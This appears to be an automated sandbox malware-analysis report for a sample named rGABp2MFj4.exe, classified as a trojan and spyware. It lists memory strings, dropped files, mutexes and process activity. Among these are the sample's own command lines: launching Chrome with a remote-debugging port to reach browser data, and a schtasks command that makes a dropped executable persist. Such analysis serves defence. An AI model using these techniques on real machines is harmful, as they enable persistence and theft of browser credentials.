Source: chrome.exe, 00000003.00000003.1840494327.00005300006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1860083738.00005300000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863081408.00005300006C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/:
Source: chrome.exe, 00000003.00000002.1860083738.00005300000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863081408.00005300006C5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1868114992.0000530000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
Source: chrome.exe, 00000003.00000002.1868114992.0000530000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?usp=installed_webappS
Source: chrome.exe, 00000003.00000003.1840494327.00005300006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1860083738.00005300000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863081408.00005300006C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/J
Source: chrome.exe, 00000003.00000003.1840494327.00005300006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1860083738.00005300000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863081408.00005300006C5000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1868114992.0000530000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
Source: chrome.exe, 00000003.00000002.1877959654.0000530000D30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/y
Source: chrome.exe, 00000003.00000002.1864027553.0000530000884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862803001.000053000060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862452486.0000530000500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000003.00000002.1863081408.00005300006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1864081426.00005300008A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy
Source: chrome.exe, 00000003.00000002.1863081408.00005300006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhone
Source: chrome.exe, 00000003.00000002.1863081408.00005300006C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862357291.00005300004A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myaccount.google.com/signinoptions/password?utm_source=ga-chrome-actions&utm_medium=changePW
Source: chrome.exe, 00000003.00000002.1866274769.0000530000A58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1853490479.0000530000FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1853461911.0000530000E40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000003.00000002.1861306394.00005300001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000003.00000002.1861535531.000053000020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oauthaccountmanager.googleapis.com/v1/issuetoken
Source: chrome.exe, 00000003.00000002.1878363566.0000530000DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1848666639.00005300009EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878326750.0000530000DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1&target=OPTIMIZATION_TARGET_PAGE_TOPICS_
Source: chrome.exe, 00000003.00000002.1878363566.0000530000DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878326750.0000530000DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1673999601&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000003.1848666639.00005300009EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878401257.0000530000DBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878326750.0000530000DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1678906374&target=OPTIMIZATION_TARGET_OMN
Source: chrome.exe, 00000003.00000002.1865024855.000053000096C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878326750.0000530000DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1679317318&target=OPTIMIZATION_TARGET_LAN
Source: chrome.exe, 00000003.00000002.1878363566.0000530000DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1848666639.00005300009EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878401257.0000530000DBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878326750.0000530000DA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1861755410.00005300002C0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049402&target=OPTIMIZATION_TARGET_GEO
Source: chrome.exe, 00000003.00000002.1878363566.0000530000DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878326750.0000530000DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695049414&target=OPTIMIZATION_TARGET_NOT
Source: chrome.exe, 00000003.00000002.1878363566.0000530000DB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1848666639.00005300009EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878401257.0000530000DBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1865024855.000053000096C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878326750.0000530000DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=1695051229&target=OPTIMIZATION_TARGET_PAG
Source: chrome.exe, 00000003.00000003.1848666639.00005300009EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878401257.0000530000DBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1878326750.0000530000DA0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/downloads?name=210230727&target=OPTIMIZATION_TARGET_CLIE
Source: chrome.exe, 00000003.00000002.1862393688.00005300004D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://optimizationguide-pa.googleapis.com/v1:GetHints
Source: chrome.exe, 00000003.00000002.1866274769.0000530000A58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1853490479.0000530000FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1853461911.0000530000E40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://photos.google.com/settings?referrer=CHROME_NTP
Source: chrome.exe, 00000003.00000002.1866274769.0000530000A58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1853490479.0000530000FD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1853461911.0000530000E40000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000003.00000002.1859766317.000053000008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditing
Source: chrome.exe, 00000003.00000002.1859996953.00005300000B4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000003.00000002.1861306394.00005300001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000003.00000002.1863495023.0000530000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862393688.00005300004D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.1863495023.0000530000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862393688.00005300004D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000003.00000002.1865864991.0000530000A24000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000003.00000002.1861306394.00005300001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000003.00000002.1867675469.0000530000BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000003.00000002.1867838931.0000530000BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000003.00000002.1867838931.0000530000BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000003.00000002.1867838931.0000530000BE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000003.00000002.1861858064.000053000030C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1867675469.0000530000BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1859766317.000053000008C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000003.00000002.1862922030.000053000062C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1853461911.0000530000E40000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1848582862.0000530000C6C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000003.00000002.1865470421.00005300009D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Chary
Source: chrome.exe, 00000003.00000002.1863495023.0000530000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1864187292.00005300008C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1861306394.00005300001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000003.00000002.1863495023.0000530000720000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1864187292.00005300008C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1861306394.00005300001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000003.00000002.1864311431.0000530000904000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000003.00000002.1864027553.0000530000884000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1867256153.0000530000B5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862803001.000053000060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1862452486.0000530000500000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000003.00000002.1862393688.00005300004D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000003.00000002.1866274769.0000530000A58000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000003.00000002.1859446738.0000530000014000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000003.00000002.1861535531.000053000020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000003.00000002.1861535531.000053000020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000003.00000002.1862690787.00005300005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1861535531.000053000020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000003.00000002.1861535531.000053000020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1879042195.0000530000EE8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000003.00000002.1862393688.00005300004D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000003.00000002.1862984380.000053000066C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000003.00000003.1840494327.00005300006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863081408.00005300006C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000003.00000002.1861306394.00005300001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000003.00000002.1861306394.00005300001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytcae
Source: chrome.exe, 00000003.00000003.1840494327.00005300006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863081408.00005300006C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000003.00000002.1867675469.0000530000BB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/Q_
Source: chrome.exe, 00000003.00000002.1878055486.0000530000D4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1864187292.00005300008C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1840494327.00005300006D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1863081408.00005300006C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6B9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6C6B9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6B9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6C6B9D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6B9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 9_2_6C6B9E27

System Summary

barindex
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File dump: service123.exe.0.dr 314617856 Jump to dropped file
Source: rGABp2MFj4.exe Static PE information: section name:
Source: rGABp2MFj4.exe Static PE information: section name: .idata
Source: rGABp2MFj4.exe Static PE information: section name:
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_007051B0 9_2_007051B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00703E20 9_2_00703E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E2CCE 9_2_6C6E2CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6ACD00 9_2_6C6ACD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6AEE50 9_2_6C6AEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6B0FC0 9_2_6C6B0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6F0AC0 9_2_6C6F0AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6B44F0 9_2_6C6B44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E46E0 9_2_6C6E46E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6D87C0 9_2_6C6D87C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E07D0 9_2_6C6E07D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6F0060 9_2_6C6F0060
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E2090 9_2_6C6E2090
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6C2210 9_2_6C6C2210
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6D2360 9_2_6C6D2360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6FDC70 9_2_6C6FDC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C773D00 9_2_6C773D00
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6D98F0 9_2_6C6D98F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6B5880 9_2_6C6B5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E7A20 9_2_6C6E7A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6EDBEE 9_2_6C6EDBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6E140E 9_2_6C6E140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6F1510 9_2_6C6F1510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6EF610 9_2_6C6EF610
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6CF760 9_2_6C6CF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6A3000 9_2_6C6A3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C6B70C0 9_2_6C6B70C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C765180 9_2_6C765180
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C775980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C773560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C76ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C773B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C7736E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C775A70 appears 75 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6C773820 appears 31 times
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 1212
Source: rGABp2MFj4.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: rGABp2MFj4.exe Static PE information: Section: lbckixlr ZLIB complexity 0.9939832915314252
Source: rGABp2MFj4.exe Binary or memory string: i.VBP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@19/7@17/5
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7860
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_03
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: chrome.exe, 00000003.00000002.1864109043.00005300008B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: rGABp2MFj4.exe ReversingLabs: Detection: 60%
Source: rGABp2MFj4.exe Virustotal: Detection: 49%
Source: unknown Process created: C:\Users\user\Desktop\rGABp2MFj4.exe "C:\Users\user\Desktop\rGABp2MFj4.exe"
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2272,i,11391944935882270509,647615027426193092,262144 /prefetch:8
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 1212
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2532 --field-trial-handle=2272,i,11391944935882270509,647615027426193092,262144 /prefetch:8 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
